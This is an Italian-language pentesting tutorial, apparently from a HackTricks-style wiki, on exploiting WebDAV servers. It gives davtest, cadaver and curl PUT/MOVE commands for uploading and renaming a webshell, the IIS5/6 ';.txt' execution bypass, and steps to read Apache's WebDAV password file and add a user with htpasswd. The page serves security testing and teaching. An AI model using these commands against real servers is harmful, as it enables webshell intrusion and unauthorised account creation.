Utilizza Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della comunità più avanzati al mondo. Ottieni l'accesso oggi:

Quando si tratta di un Server HTTP con WebDav abilitato, è possibile manipolare file se si dispongono delle credenziali corrette, di solito verificate tramite Autenticazione di Base HTTP. Ottenere il controllo su un tale server spesso comporta caricare ed eseguire un webshell.

L'accesso al server WebDav di solito richiede credenziali valide, con il bruteforce WebDav che è un metodo comune per ottenerle.

Per superare le restrizioni sui caricamenti di file, specialmente quelli che impediscono l'esecuzione di script lato server, potresti:

• Caricare file con estensioni eseguibili direttamente se non sono limitati.

• Rinominare i file non eseguibili caricati (come .txt) con un'estensione eseguibile.

• Copiare i file non eseguibili caricati, cambiando la loro estensione in una eseguibile.

DavTest

Davtest cerca di caricare diversi file con estensioni diverse e controlla se l'estensione viene eseguita:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Cadaver

Puoi utilizzare questo strumento per connetterti al server WebDav e eseguire azioni (come caricare, spostare o eliminare) manualmente.

cadaver <IP>

Richiesta PUT

curl -T 'shell.txt' 'http://$ip'

Richiesta MOVE

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Usa Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della community più avanzati al mondo. Ottieni l'accesso oggi:

Vulnerabilità WebDav in IIS5/6

Questa vulnerabilità è molto interessante. Il WebDav non permette di caricare o rinominare file con estensione .asp. Tuttavia, è possibile aggirare questo problema aggiungendo alla fine del nome ";.txt" e il file verrà eseguito come se fosse un file .asp (si potrebbe anche usare ".html" invece di ".txt" ma NON dimenticare il ";").

Quindi puoi caricare la tua shell come file ".txt" e copiarla/spostarla in un file ".asp;.txt". Accedendo a quel file attraverso il server web, verrà eseguito (cadaver dirà che l'azione di spostamento non ha funzionato, ma in realtà ha funzionato).

Credenziali post

Se il Webdav utilizzava un server Apache, dovresti controllare i siti configurati in Apache. Comunemente: /etc/apache2/sites-enabled/000-default

All'interno potresti trovare qualcosa del genere:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Come puoi vedere, ci sono i file con le credenziali valide per il server webdav:

/etc/apache2/users.password

All'interno di questo tipo di file troverai il nome utente e un hash della password. Queste sono le credenziali che il server webdav utilizza per autenticare gli utenti.

Puoi provare a decifrarle, o a aggiungerne altre se per qualche motivo desideri accedere al server webdav:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Per verificare se le nuove credenziali funzionano, puoi fare:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Riferimenti

• https://vk9-sec.com/exploiting-webdav/

Usa Trickest per creare e automatizzare facilmente flussi di lavoro supportati dagli strumenti comunitari più avanzati al mondo. Ottieni l'accesso oggi: